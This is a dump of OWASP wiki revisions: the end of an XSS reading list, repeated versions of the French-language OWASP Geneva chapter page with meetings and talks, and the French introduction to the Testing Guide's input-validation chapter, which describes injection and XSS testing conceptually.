* Dafydd Stuttard, Marcus Pinto - "The Web Application's Handbook - Discovering and Exploiting Security Flaws", 2008, Wiley, ISBN 978-0-470-17077-9<br />
* Jeremiah Grossman, Robert "RSnake" Hansen, Petko "pdp" D. Petkov, Anton Rager, Seth Fogie - "Cross Site Scripting Attacks: XSS Exploits and Defense", 2007, Syngress, ISBN-10: 1-59749-154-3<br />
'''Whitepapers'''<br><br />
* '''CERT''' - Malicious HTML Tags Embedded in Client Web Requests: [http://www.cert.org/advisories/CA-2000-02.html Read]<br />
* '''Rsnake''' - XSS Cheat Sheet: [http://ha.ckers.org/xss.html Read]<br />
* '''cgisecurity.com''' - The Cross Site Scripting FAQ: [http://www.cgisecurity.com/articles/xss-faq.shtml Read]<br />
* '''G.Ollmann''' - HTML Code Injection and Cross-site scripting: [http://www.technicalinfo.net/papers/CSS.html Read]<br />
* '''A. Calvo, D.Tiscornia''' - alert('A javascritp agent'): [http://corelabs.coresecurity.com/index.php?module=FrontEndMod&action=view&type=publication&name=alert%28A_javascritp_agent%29 Read] ( To be published )<br />
* '''S. Frei, T. Dübendorfer, G. Ollmann, M. May''' - Understanding the Web browser threat: [http://www.techzoom.net/publications/insecurity-iceberg/index.en Read]</div>Thoferhttps://wiki.owasp.org/index.php?title=Geneva&diff=187239Geneva2014-12-19T09:15:31Z<p>Thofer: /* Agenda des meetings */</p>
<hr />
<div>__NOTOC__ <br />
<br />
'''If you are looking for information on nationwide OWASP Switzerland chapter activities and meetings held in the German-speaking area, please follow this link to the [https://www.owasp.org/index.php/Switzerland OWASP Switzerland chapter].'''<br />
<br><br><br />
= Bienvenue =<br />
[[File:Owasp_switzerland_geneva_logo.png|150px|right|OWASP Switzerland Chapter Logo]]<br />
<br />
Bienvenue sur la page d'accueil de la section locale OWASP Geneva!<br />
* Pour vous inscrire à la liste de diffusion: [http://lists.owasp.org/mailman/listinfo/owasp-geneva OWASP Geneva mailing list]<br />
* Pour nous suivre sur Twitter: [https://twitter.com/OWASP_Geneva @OWASP_Geneva]<br />
<!--* Pour consulter le programme du prochain meeting (25 juin 2013) et vous inscrire: [http://owaspeutourgeneva.eventbrite.com owaspeutourgeneva.eventbrite.com]--><br />
<br />
<br> Pour consulter le site de la section nationale: '''[[Switzerland|OWASP Switzerland chapter]]'''<br />
<br><br />
<br><br />
<br />
= Agenda des meetings =<br />
Les meetings ont lieu sur une base trimestrielle et se déroulent généralement dans une salle mise à disposition par un sponsor ou par l'un des partenaires académiques/institutionnels de la section. Dès décembre 2012, les meetings se tiennent en itinérance dans deux villes de Suisse romande. L'organisation et le détail des meetings est communiqué via la [http://lists.owasp.org/mailman/listinfo/owasp-geneva liste de diffusion] et via le [https://twitter.com/OWASP_Geneva compte Twitter de la section].<br />
<br />
'''PROCHAIN MEETING : Lundi 19 janvier 2015 dès 18h'''<br><br />
Lieu: Genève (informations détaillées remises aux personnes inscrites)<br/><br />
Inscription: (lien à venir)<br/><br />
Sponsors/Remerciements: Direction générale des systèmes d'information du Canton de Genève ([http://www.ge.ch/dgsi/welcome.asp link])<br/><br />
Conférence: (informations à venir)<br/><br />
<br><br />
<br />
= Newsletter et contact =<br />
Par email:<br>[mailto:antonio.fontes@owasp.org OWASP Geneva]<br><br><br />
Par la liste de diffusion:<br>[http://lists.owasp.org/mailman/listinfo/owasp-geneva OWASP Geneva Mailing List]<br><br><br />
Par Twitter:<br>[https://twitter.com/OWASP_Geneva @OWASP_Geneva]<br />
<br><br />
<br />
<br />
= Participation =<br />
Les meetings OWASP sont ouverts à tous et gratuits. Nous encourageons l'échange informel sur tous sujets relatifs à la sécurité applicative. Toute personne intéressée par la sécurité applicative est la bienvenue aux meetings!<br />
<br />
<br> Les sujets principalement abordés sont:<br />
<br />
*Analyse et conception d'applications sécurisées<br />
*Techniques et méthodes de développement sécurisé<br />
*Évaluation et validation de la sécurité des applications (tests d'intrusion, recherche de vulnérabilités)<br />
*Sécurité d'architectures et technologies de développement logiciel<br />
*Gouvernance de la sécurité logicielle dans les organisations<br />
<br><br />
<br />
'''Vous souhaitez présenter lors d'un meeting?'''<br><br />
Si vous souhaitez présenter un sujet lors d'un prochain meeting OWASP ou avez une question relative aux meetings de la section OWASP Geneva, n'hésitez pas à envoyer un email au [mailto:geneva@owasp.ch comité]. Toute intervention orale (présentation, formation) lors d'un meeting OWASP est soumise à l'acceptation préalable du [https://www.owasp.org/index.php/Speaker_Agreement règlement des conférenciers].<br />
<br><br />
<br />
= Sponsoring =<br />
Quatre formules de sponsoring sont actuellement proposées aux organisations désireuses de soutenir la mission de l'OWASP:<br />
* Chapter Supporter: soutien financier annuel de la section OWASP Geneva<br />
* Single Meeting Supporter: soutien financier ponctuel, pour un meeting spécifique de la section OWASP Geneva <br />
* Facility Sponsor: mise à disposition de salles équipées pour la tenue des meetings OWASP Geneva<br />
* Organization Supporter: soutien financier annuel de la fondation OWASP + 40% de la cotisation reversés à la section affiliée (OWASP Geneva)<br />
<br />
Pour toute information relative au sponsoring affilié à la section, merci de contacter le [mailto:geneva@owasp.ch Comité] ou consulter la page [https://www.owasp.org/index.php/Membership memberships] dédiée à cet effet.<br />
<br><br />
<br />
= Organigramme =<br />
La Section OWASP Geneva est organisée sous la forme d'un Comité (OWASP Geneva Chapter Board) en charge de la gestion de la section et de ses activités. Le Comité est composé de:<br />
* [mailto:antonio.fontes@owasp.org Antonio Fontes] (''chapter leader'')<br />
* [mailto:thomas.hofer@owasp.org Thomas Hofer] (''board member'')<br />
* Vous pouvez [mailto:geneva@owasp.ch cliquer ici] pour joindre le Comité via une seule adresse <br />
<br><br />
<br />
= Historique =<br />
'''Lundi 15 décembre 2014''' | Local Chapter meeting<br/><br />
Lieu: Genève<br/><br />
Conférence: Stéphane Adamiste - "Modélisation des menaces: Comment gérer les aspects de sécurité dans les projets" ([https://www.owasp.org/index.php/File:1c_ThreatModelling_F.pptx slides])<br/><br />
<br />
'''Mercredi 25 juin 2013''' | OWASP European Chapters Tour 2013<br/><br />
Lieu: Genève<br/><br />
Conférence: Sebastien Deleersnyder - "Open SAMM"([https://www.owasp.org/index.php/File:OpenSAMM_-_AppSecEU_2014_talk_seba_-_bart_v_Final.pptx slides])<br/><br />
<br />
'''Mardi 7 Mai 2013''' | Local Chapter meeting<br><br />
Lieu: Genève<br/><br />
Conférence: Simon Blanchet - "Gouvernance de la sécurité logicielle, le modèle BSIMM 4"([https://owasp.org/images/e/e7/OWASP_Geneva-2013_05_07-Simon_Blanchet-BSIMM4.pptx slides])<br/><br />
<br />
'''5 et 6 décembre 2012''' | Local Chapter Meeting<br><br />
Lieux: Genève (6 décembre), Yverdon-les-Bains (5 décembre)<br><br />
[http://lists.owasp.org/pipermail/owasp-geneva/2012-November/000039.html informations] | [https://www.owasp.org/images/9/90/OWASP_Geneva-Sylvain_Maret-Web_services_security_REST_vs_SOAP.pdf slides]<br />
<br />
'''13. December 2011''' | Local Chapter Meeting<br> All information about the meeting can be found [https://lists.owasp.org/pipermail/owasp-switzerland/2011-December/000223.html here]<br />
<br />
'''13. Mai 2011''' | Swiss Cyber Storm III<br><br />
Les sections OWASP Suisse et Genève présenteront l'OWASP lors du SCS3. <br />
<br />
'''17. Février 2011''' | Local ChaptervMeeting<br><br />
Lieu: Yverdon-Les-Bains. [http://owasp.ch/geneva/owasp-communique-meeting-201102.pdf informations] | [https://spreadsheets.google.com/a/owasp.org/viewform?hl=en&formkey=dGtYelV6X0NzZXRDV2pSbVBrX2xyUHc6MQ#gid=3 inscriptions]<br><br />
Slides de présentation: [[Geneva_February_2011_Meeting|OWASP Geneva Meeting February 2011]].<br />
<br />
'''23. Mars 2010''' | Local ChaptervMeeting<br><br />
Lieu: Application Security Forum, à Genève. [http://owasp.ch/geneva/owasp-communique-meeting-201102.pdf informations] | [https://spreadsheets.google.com/a/owasp.org/viewform?hl=en&formkey=dGtYelV6X0NzZXRDV2pSbVBrX2xyUHc6MQ#gid=3 inscriptions]<br><br />
Slides de présentation: [[Geneva_February_2011_Meeting|OWASP Geneva Meeting February 2011]].<br />
<br />
'''22. Janvier 2010''' | Challenge Insomni'hack<br><br />
La section OWASP Geneva tiendra un desk d'informations lors du prochain challenge Insomni'hack 2010'''. N'hésitez pas à venir nous rendre visite et découvrir les activités et projets de l'OWASP! [http://www.scrt.ch/pages/concours10.html informations]<br />
<br />
'''25. Avril 2009 | Local Chapter Meeting'''<br/><br />
Résultats des sondages: [http://www.surveymonkey.com/s.aspx?sm=4Uj8sRJAAWEhZStomAIUfg_3d_3d survey]<br><br />
Slides de présentations: [[Geneva_Spring_2009_Meeting|Geneva Spring 09 meeting]].<br><br />
<br />
<br><br />
<br />
= Supports = <br />
'''Juin 2013 - OWASP Meeting - Europe Chapters Tour'''<br />
* S. Deleersnyder - [https://www.owasp.org/index.php/File:OpenSAMM_-_AppSecEU_2014_talk_seba_-_bart_v_Final.pptx OWASSP OpenSAMM]<br />
<br />
'''Décembre 2012 - OWASP Meeting Genève et Yverdon-les-Bains'''<br />
* S. Maret - [https://www.owasp.org/images/9/90/OWASP_Geneva-Sylvain_Maret-Web_services_security_REST_vs_SOAP.pdf Services web SOAP et REST: quelles opportunités pour la sécurité?]<br />
<br />
'''Mai 2011 - Swiss Cyber Storm (Rapperswil)'''<br />
* A. Fontes - [https://www.owasp.org/index.php/File:SwissCyberStorm3-Do_you_know_OWASP.pdf About the OWASP].<br />
<br />
'''Février 2011 meeting (Feb 11th. 2011, Yverdon-les-Bains)'''<br />
* A. Fontes - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-keynote.pptx Keynote] (in French)<br />
* S. Andrivet/F.Bottaccio - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-0days.pptx 0-days: le diable se cache dans les plug-ins] (in French)<br />
* T. Hofer - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-TrouvezVosBugsLePremier.pptx Code source - Soyez le premier à trouver vos failles de sécurité!] (in French)<br />
<br />
'''Spring 2010 meeting (March 4th. 2010, Geneva)'''<br />
* A. Fontes - Keynote ([http://www.scribd.com/doc/28230164/Geneva-Application-Security-Forum-2010-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
* S. Maret - Integrating strong authentication in web applications (in French) ([http://www.scribd.com/doc/28230164/Geneva-Application-Security-Forum-2010-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
* P. Leothaud - Security considerations on strong authentication: analysis of the ASVS (in French) ([http://www.scribd.com/doc/28230739/Geneva-Application-Security-Forum online])<br />
* R. Ott - Digital identities federation and OpenID (in English) ([http://www.scribd.com/doc/28229887/Geneva-Application-Security-Forum-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
<br />
'''Spring 2009 meeting (April 23rd. 2009, Geneva)'''<br />
* A. Fontes - Introduction and keynote ([http://www.owasp.org/images/3/38/0_OWASP-geneva-Spring-09-FONTES.pptx Office 2007], [http://www.owasp.org/images/8/8b/0_OWASP-geneva-Spring-09-FONTES.ppt Office 2003], [http://www.owasp.org/index.php/Image:0_OWASP-geneva-Spring-09-FONTES.pdf PDF]) (in French)<br />
* S. Gioria - The OWASP Top 10 ([http://www.owasp.org/images/d/de/1_OWASP-geneva-Spring-09-GIORIA.ppt Office 2003], [http://www.owasp.org/index.php/Image:1_OWASP-geneva-Spring-09-GIORIA.pdf PDF]) (in French)<br />
* G.K. Agopome - Merging security into the SDLC: from theory to practice ([http://www.owasp.org/images/d/da/2_OWASP-geneva-Spring-09-AGOPOME.ppt Office 2003], [http://www.owasp.org/index.php/Image:2_OWASP-geneva-Spring-09-AGOPOME.pdf PDF]) (in French)<br />
<headertabs /><br />
<br />
<paypal>Geneva (Switzerland) Chapter</paypal><br />
<br />
{| cellspacing="15"<br />
|-<br />
| [[Image:Join the list.png|120px|link=https://lists.owasp.org/mailman/listinfo/owasp-geneva]]<br />
| [[Image:Follow-us-on-twitter.png|120px|link=https://twitter.com/OWASP_Geneva]]<br />
| [[Image:Facebook-icon.png|120px|link=https://www.facebook.com/OWASPSwitzerland]]<br />
|}<br />
<br />
[[Category:OWASP_Chapter]] [[Category:Switzerland]] [[Category:Europe]]</div>Thoferhttps://wiki.owasp.org/index.php?title=Geneva&diff=187238Geneva2014-12-19T09:14:20Z<p>Thofer: /* Historique */</p>
<hr />
<div>__NOTOC__ <br />
<br />
'''If you are looking for information on nationwide OWASP Switzerland chapter activities and meetings held in the German-speaking area, please follow this link to the [https://www.owasp.org/index.php/Switzerland OWASP Switzerland chapter].'''<br />
<br><br><br />
= Bienvenue =<br />
[[File:Owasp_switzerland_geneva_logo.png|150px|right|OWASP Switzerland Chapter Logo]]<br />
<br />
Bienvenue sur la page d'accueil de la section locale OWASP Geneva!<br />
* Pour vous inscrire à la liste de diffusion: [http://lists.owasp.org/mailman/listinfo/owasp-geneva OWASP Geneva mailing list]<br />
* Pour nous suivre sur Twitter: [https://twitter.com/OWASP_Geneva @OWASP_Geneva]<br />
<!--* Pour consulter le programme du prochain meeting (25 juin 2013) et vous inscrire: [http://owaspeutourgeneva.eventbrite.com owaspeutourgeneva.eventbrite.com]--><br />
<br />
<br> Pour consulter le site de la section nationale: '''[[Switzerland|OWASP Switzerland chapter]]'''<br />
<br><br />
<br><br />
<br />
= Agenda des meetings =<br />
Les meetings ont lieu sur une base trimestrielle et se déroulent généralement dans une salle mise à disposition par un sponsor ou par l'un des partenaires académiques/institutionnels de la section. Dès décembre 2012, les meetings se tiennent en itinérance dans deux villes de Suisse romande. L'organisation et le détail des meetings est communiqué via la [http://lists.owasp.org/mailman/listinfo/owasp-geneva liste de diffusion] et via le [https://twitter.com/OWASP_Geneva compte Twitter de la section].<br />
<br />
'''PROCHAIN MEETING : Lundi 15 décembre 2014 dès 18h'''<br><br />
Lieu: Genève (informations détaillées remises aux personnes inscrites)<br/><br />
Inscription: [https://www.eventbrite.com/e/owasp-geneva-meeting-du-15-decembre-2014-tickets-14604340977 formulaire]<br/><br />
Sponsors/Remerciements: Direction générale des systèmes d'information du Canton de Genève ([http://www.ge.ch/dgsi/welcome.asp link])<br/><br />
Conférence: Stéphane Adamiste - "La modélisation des menaces dans les applications web" (slides disponibles après la conférence])<br/><br />
<br><br />
<br />
= Newsletter et contact =<br />
Par email:<br>[mailto:antonio.fontes@owasp.org OWASP Geneva]<br><br><br />
Par la liste de diffusion:<br>[http://lists.owasp.org/mailman/listinfo/owasp-geneva OWASP Geneva Mailing List]<br><br><br />
Par Twitter:<br>[https://twitter.com/OWASP_Geneva @OWASP_Geneva]<br />
<br><br />
<br />
<br />
= Participation =<br />
Les meetings OWASP sont ouverts à tous et gratuits. Nous encourageons l'échange informel sur tous sujets relatifs à la sécurité applicative. Toute personne intéressée par la sécurité applicative est la bienvenue aux meetings!<br />
<br />
<br> Les sujets principalement abordés sont:<br />
<br />
*Analyse et conception d'applications sécurisées<br />
*Techniques et méthodes de développement sécurisé<br />
*Évaluation et validation de la sécurité des applications (tests d'intrusion, recherche de vulnérabilités)<br />
*Sécurité d'architectures et technologies de développement logiciel<br />
*Gouvernance de la sécurité logicielle dans les organisations<br />
<br><br />
<br />
'''Vous souhaitez présenter lors d'un meeting?'''<br><br />
Si vous souhaitez présenter un sujet lors d'un prochain meeting OWASP ou avez une question relative aux meetings de la section OWASP Geneva, n'hésitez pas à envoyer un email au [mailto:geneva@owasp.ch comité]. Toute intervention orale (présentation, formation) lors d'un meeting OWASP est soumise à l'acceptation préalable du [https://www.owasp.org/index.php/Speaker_Agreement règlement des conférenciers].<br />
<br><br />
<br />
= Sponsoring =<br />
Quatre formules de sponsoring sont actuellement proposées aux organisations désireuses de soutenir la mission de l'OWASP:<br />
* Chapter Supporter: soutien financier annuel de la section OWASP Geneva<br />
* Single Meeting Supporter: soutien financier ponctuel, pour un meeting spécifique de la section OWASP Geneva <br />
* Facility Sponsor: mise à disposition de salles équipées pour la tenue des meetings OWASP Geneva<br />
* Organization Supporter: soutien financier annuel de la fondation OWASP + 40% de la cotisation reversés à la section affiliée (OWASP Geneva)<br />
<br />
Pour toute information relative au sponsoring affilié à la section, merci de contacter le [mailto:geneva@owasp.ch Comité] ou consulter la page [https://www.owasp.org/index.php/Membership memberships] dédiée à cet effet.<br />
<br><br />
<br />
= Organigramme =<br />
La Section OWASP Geneva est organisée sous la forme d'un Comité (OWASP Geneva Chapter Board) en charge de la gestion de la section et de ses activités. Le Comité est composé de:<br />
* [mailto:antonio.fontes@owasp.org Antonio Fontes] (''chapter leader'')<br />
* [mailto:thomas.hofer@owasp.org Thomas Hofer] (''board member'')<br />
* Vous pouvez [mailto:geneva@owasp.ch cliquer ici] pour joindre le Comité via une seule adresse <br />
<br><br />
<br />
= Historique =<br />
'''Lundi 15 décembre 2014''' | Local Chapter meeting<br/><br />
Lieu: Genève<br/><br />
Conférence: Stéphane Adamiste - "Modélisation des menaces: Comment gérer les aspects de sécurité dans les projets" ([https://www.owasp.org/index.php/File:1c_ThreatModelling_F.pptx slides])<br/><br />
<br />
'''Mercredi 25 juin 2013''' | OWASP European Chapters Tour 2013<br/><br />
Lieu: Genève<br/><br />
Conférence: Sebastien Deleersnyder - "Open SAMM"([https://www.owasp.org/index.php/File:OpenSAMM_-_AppSecEU_2014_talk_seba_-_bart_v_Final.pptx slides])<br/><br />
<br />
'''Mardi 7 Mai 2013''' | Local Chapter meeting<br><br />
Lieu: Genève<br/><br />
Conférence: Simon Blanchet - "Gouvernance de la sécurité logicielle, le modèle BSIMM 4"([https://owasp.org/images/e/e7/OWASP_Geneva-2013_05_07-Simon_Blanchet-BSIMM4.pptx slides])<br/><br />
<br />
'''5 et 6 décembre 2012''' | Local Chapter Meeting<br><br />
Lieux: Genève (6 décembre), Yverdon-les-Bains (5 décembre)<br><br />
[http://lists.owasp.org/pipermail/owasp-geneva/2012-November/000039.html informations] | [https://www.owasp.org/images/9/90/OWASP_Geneva-Sylvain_Maret-Web_services_security_REST_vs_SOAP.pdf slides]<br />
<br />
'''13. December 2011''' | Local Chapter Meeting<br> All information about the meeting can be found [https://lists.owasp.org/pipermail/owasp-switzerland/2011-December/000223.html here]<br />
<br />
'''13. Mai 2011''' | Swiss Cyber Storm III<br><br />
Les sections OWASP Suisse et Genève présenteront l'OWASP lors du SCS3. <br />
<br />
'''17. Février 2011''' | Local ChaptervMeeting<br><br />
Lieu: Yverdon-Les-Bains. [http://owasp.ch/geneva/owasp-communique-meeting-201102.pdf informations] | [https://spreadsheets.google.com/a/owasp.org/viewform?hl=en&formkey=dGtYelV6X0NzZXRDV2pSbVBrX2xyUHc6MQ#gid=3 inscriptions]<br><br />
Slides de présentation: [[Geneva_February_2011_Meeting|OWASP Geneva Meeting February 2011]].<br />
<br />
'''23. Mars 2010''' | Local ChaptervMeeting<br><br />
Lieu: Application Security Forum, à Genève. [http://owasp.ch/geneva/owasp-communique-meeting-201102.pdf informations] | [https://spreadsheets.google.com/a/owasp.org/viewform?hl=en&formkey=dGtYelV6X0NzZXRDV2pSbVBrX2xyUHc6MQ#gid=3 inscriptions]<br><br />
Slides de présentation: [[Geneva_February_2011_Meeting|OWASP Geneva Meeting February 2011]].<br />
<br />
'''22. Janvier 2010''' | Challenge Insomni'hack<br><br />
La section OWASP Geneva tiendra un desk d'informations lors du prochain challenge Insomni'hack 2010'''. N'hésitez pas à venir nous rendre visite et découvrir les activités et projets de l'OWASP! [http://www.scrt.ch/pages/concours10.html informations]<br />
<br />
'''25. Avril 2009 | Local Chapter Meeting'''<br/><br />
Résultats des sondages: [http://www.surveymonkey.com/s.aspx?sm=4Uj8sRJAAWEhZStomAIUfg_3d_3d survey]<br><br />
Slides de présentations: [[Geneva_Spring_2009_Meeting|Geneva Spring 09 meeting]].<br><br />
<br />
<br><br />
<br />
= Supports = <br />
'''Juin 2013 - OWASP Meeting - Europe Chapters Tour'''<br />
* S. Deleersnyder - [https://www.owasp.org/index.php/File:OpenSAMM_-_AppSecEU_2014_talk_seba_-_bart_v_Final.pptx OWASSP OpenSAMM]<br />
<br />
'''Décembre 2012 - OWASP Meeting Genève et Yverdon-les-Bains'''<br />
* S. Maret - [https://www.owasp.org/images/9/90/OWASP_Geneva-Sylvain_Maret-Web_services_security_REST_vs_SOAP.pdf Services web SOAP et REST: quelles opportunités pour la sécurité?]<br />
<br />
'''Mai 2011 - Swiss Cyber Storm (Rapperswil)'''<br />
* A. Fontes - [https://www.owasp.org/index.php/File:SwissCyberStorm3-Do_you_know_OWASP.pdf About the OWASP].<br />
<br />
'''Février 2011 meeting (Feb 11th. 2011, Yverdon-les-Bains)'''<br />
* A. Fontes - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-keynote.pptx Keynote] (in French)<br />
* S. Andrivet/F.Bottaccio - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-0days.pptx 0-days: le diable se cache dans les plug-ins] (in French)<br />
* T. Hofer - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-TrouvezVosBugsLePremier.pptx Code source - Soyez le premier à trouver vos failles de sécurité!] (in French)<br />
<br />
'''Spring 2010 meeting (March 4th. 2010, Geneva)'''<br />
* A. Fontes - Keynote ([http://www.scribd.com/doc/28230164/Geneva-Application-Security-Forum-2010-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
* S. Maret - Integrating strong authentication in web applications (in French) ([http://www.scribd.com/doc/28230164/Geneva-Application-Security-Forum-2010-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
* P. Leothaud - Security considerations on strong authentication: analysis of the ASVS (in French) ([http://www.scribd.com/doc/28230739/Geneva-Application-Security-Forum online])<br />
* R. Ott - Digital identities federation and OpenID (in English) ([http://www.scribd.com/doc/28229887/Geneva-Application-Security-Forum-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
<br />
'''Spring 2009 meeting (April 23rd. 2009, Geneva)'''<br />
* A. Fontes - Introduction and keynote ([http://www.owasp.org/images/3/38/0_OWASP-geneva-Spring-09-FONTES.pptx Office 2007], [http://www.owasp.org/images/8/8b/0_OWASP-geneva-Spring-09-FONTES.ppt Office 2003], [http://www.owasp.org/index.php/Image:0_OWASP-geneva-Spring-09-FONTES.pdf PDF]) (in French)<br />
* S. Gioria - The OWASP Top 10 ([http://www.owasp.org/images/d/de/1_OWASP-geneva-Spring-09-GIORIA.ppt Office 2003], [http://www.owasp.org/index.php/Image:1_OWASP-geneva-Spring-09-GIORIA.pdf PDF]) (in French)<br />
* G.K. Agopome - Merging security into the SDLC: from theory to practice ([http://www.owasp.org/images/d/da/2_OWASP-geneva-Spring-09-AGOPOME.ppt Office 2003], [http://www.owasp.org/index.php/Image:2_OWASP-geneva-Spring-09-AGOPOME.pdf PDF]) (in French)<br />
<headertabs /><br />
<br />
<paypal>Geneva (Switzerland) Chapter</paypal><br />
<br />
{| cellspacing="15"<br />
|-<br />
| [[Image:Join the list.png|120px|link=https://lists.owasp.org/mailman/listinfo/owasp-geneva]]<br />
| [[Image:Follow-us-on-twitter.png|120px|link=https://twitter.com/OWASP_Geneva]]<br />
| [[Image:Facebook-icon.png|120px|link=https://www.facebook.com/OWASPSwitzerland]]<br />
|}<br />
<br />
[[Category:OWASP_Chapter]] [[Category:Switzerland]] [[Category:Europe]]</div>Thoferhttps://wiki.owasp.org/index.php?title=File:1c_ThreatModelling_F.pptx&diff=187237File:1c ThreatModelling F.pptx2014-12-19T09:12:07Z<p>Thofer: Slides of talk by Stéphane Adamiste, Local Chapter Meeting, Geneva Chapter, dec. 15th 2014</p>
<hr />
<div>Slides of talk by Stéphane Adamiste, Local Chapter Meeting, Geneva Chapter, dec. 15th 2014</div>Thoferhttps://wiki.owasp.org/index.php?title=4.8_Tester_la_validation_des_entr%C3%A9es&diff=1871524.8 Tester la validation des entrées2014-12-17T10:44:04Z<p>Thofer: propositions de corrections de traduction / orthographe - première passe</p>
<hr />
<div>{{Template:OWASP Testing Guide v4}}<br />
<br />
''' 4.8 Tester la validation des entrées '''<br />
----<br />
<br />
La faille de sécurité la plus répandue sur les applications web est le manque de validation correcte des entrées venant des clients ou de l'environnement avant leur utilisation. Cette faille conduit à quasiment toutes les vulnérabilités dans les applications web, comme le cross site scripting, les injections SQL, les injections d’interpréteur, les attaques locale/Unicode, les attaques du système de fichier, et les dépassements de tampons (buffer overflows).<br />
<br />
<br />
Il ne faut jamais faire confiance aux données venant de l'extérieur, puisqu'elles peuvent être manipulées arbitrairement par un attaquant. "Toutes les entrées sont hostiles", a écrit Michael Howard dans son célèbre ouvrage "Writing Secure Code". C'est la règle numéro un. Malheureusement, les applications complexes ont souvent un grand nombre de points d'entrée, ce qui rend difficile pour un développeur d'appliquer cette règle. Ce chapitre traite du test de validation des données. Cela concerne le test de toutes les formes possibles d'entrées, afin de comprendre si l'application valide suffisamment les données qu'elle reçoit avant de les utiliser.<br />
<br />
<br />
Les tests de validation des entrées se subdivisent en différentes catégories :<br><br />
<br />
'''Tester le Cross site scripting'''<br><br />
Les tests de Cross Site Scripting (XSS) vérifient s'il est possible de manipuler les paramètres d'entrée de l'application pour générer des sorties malicieuses. Les testeurs trouvent des vulnérabilités XSS quand l'application ne valide pas ses entrées et crée des sorties sous leur contrôle. Cette vulnérabilité permet des attaques variées, par exemple, le vol d'information confidentielles (comme des cookies de session) ou la prise de contrôle du navigateur de la victime. Une attaque XSS brise le schéma suivant : Entrée -> Sortie == cross-site scripting.<br />
<br />
<br />
Dans ce guide, les types de tests XSS suivants seront vus en détail :<br><br />
[[Tester les Reflected Cross site scripting (OTG-INPVAL-001) |4.8.1 Tester les failles Reflected Cross Site Scripting (OTG-INPVAL-001) ]]<br><br />
[[Tester les Stored Cross site scripting (OTG-INPVAL-002) |4.8.2 Tester les failles Stored Cross Site Scripting (OTG-INPVAL-002) ]]<br><br />
<br />
Les tests XSS côté client, comme les DOM XSS et Cross Site Flashing seront vus dans la section des tests côté client.<br />
<br />
'''Tester les failles HTTP Verb Tampering and Parameter Pollution'''<br />
HTTP Verb Tampering consiste à tester les réponses de l'application à différentes méthodes HTTP accédant aux objets système. Pour chaque objet système découvert lors de l'exploration, le testeur doit essayer d'y accéder avec toutes les méthodes HTTP.<br />
HTTP Parameter Pollution consiste à tester les réponses de l'application recevant plusieurs paramètres HTTP portant le même nom. Par exemple, si le paramètre ''username'' est inclus plusieurs fois dans une requête GET ou POST, quelle version est utilisée, s'il y en a une.<br />
<br />
Les HTTP Verb Tampering sont décrit dans : <br />
<br />
[[Testing for HTTP Verb Tampering (OTG-INPVAL-003)|4.8.3 Tester les failles HTTP Verb Tampering (OTG-INPVAL-003)]] <br />
<br />
et les techniques de test des paramètres HTTP sont présentés ici : <br />
<br />
[[Testing for HTTP Parameter pollution (OTG-INPVAL-004)|4.8.4 Tester les failles HTTP Parameter pollution (OTG-INPVAL-004) ]] <br />
<br />
'''[[Testing for SQL Injection (OTG-INPVAL-005)|4.8.5 SQL Injection (OTG-INPVAL-005)]]<br>'''<br />
Les tests d'injection SQL vérifient s'il est possible d'injecter des données dans l'application de manière qu'elle exécute une requête SQL controllée par l'utilisateur dans la base de donnée back-end. Les testeurs trouvent des vulnérabilités de type injection SQL si l'application utilise des entrées utilisateur pour construire des requêtes SQL sans les valider correctement. Une exploitation réussie de ce type de vulnérabilité permet à un utilisateur non-autorisé d'accéder ou de manipuler des données dans la base de données. Notez que les données de l'application sont souvent un actif central d'une entreprise. Une attaque par injection SQL casse le schéma suivant : Entrée -> Requête SQL == Injection SQL.<br />
<br />
<br />
Les tests d'injections SQL sont ensuite subdivisés par produit/fournisseur :<br><br />
[[Tester pour Oracle |4.8.5.1 Oracle Testing]]<br><br />
[[Tester pour MySQL |4.8.5.2 MySQL Testing ]]<br><br />
[[Tester pour SQL Server |4.8.5.3 SQL Server Testing ]]<br><br />
[[OWASP_Backend_Security_Project_Testing_PostgreSQL|4.8.5.4 Testing PostgreSQL]]<br><br />
[[Tester pour MS Access|4.8.5.5 MS Access Testing]]<br><br />
[[Tester pour les injections NoSQL|4.8.5.6 Testing for NoSQL injection]]<br><br />
<br />
<br />
'''[[Tester les injections LDAP (OTG-INPVAL-006) |4.8.6 LDAP Injection (OTG-INPVAL-006)]]<br>'''<br />
Les tests d'injection LDAP sont similaires aux tests d'injection SQL. La différence est que l'on va tester le protocole LDAP au lieu de SQL, et que la cible est un serveur LDAP plutôt qu'un serveur SQL.<br />
Une attaque LDAP casse le schéma suivant :<br><br />
Entrée -> Requête LDAP == Injection LDAP<br><br />
<br />
<br />
'''[[Tester les injections ORM (OTG-INPVAL-007) |4.8.7 ORM Injection (OTG-INPVAL-007)]]<br>'''<br />
Le test d'injection ORM est similaire au test d'injection SQL. Dans ce cas, on utilise une injection SQL sur un modèle d'accès objet généré par un ORM. Du point de vue du testeur, cette attaque est identique à une attaque par injection SQL. Cependant, la vulnérabilité se trouve dans le code généré par un outil ORM.<br><br />
<br />
<br />
'''[[Tester les injection XML (OTG-INPVAL-008) |4.8.8 XML Injection (OTG-INPVAL-008)]]<br>'''<br />
Les tests d'injection XML vérifient s'il est possible d'injecter un document XML particulier dans l'application. On trouve des injections XML si le parser XML ne fait pas les validations de données adéquates.<br><br />
Une injection XML casse le schéma suivant :<br><br />
Entrée -> document XML == Injection XML<br><br />
<br />
<br />
'''[[Tester les injections SSI (OTG-INPVAL-009) |4.8.9 SSI Injection (OTG-INPVAL-009)]]<br>'''<br />
Un serveur web donne en général aux développeurs la possibilité d'ajouter des petites parties de code à l'intérieur des pages HTML statiques, sans avoir à travailler avec des langages complets côté serveur ou client. Cette fonctionnalité s'appelle l'injection "Server-Side Include" (SSI). Les tests d'injection SSI vérifient s'il est possible d'injecter dans l'application des données qui seront interprétées par les mécanismes SSI. Une exploitation réussie permettra à un attaquant d'injecter du code dans les pages HTML et même d'exécuter du code à distance.<br><br />
<br />
<br />
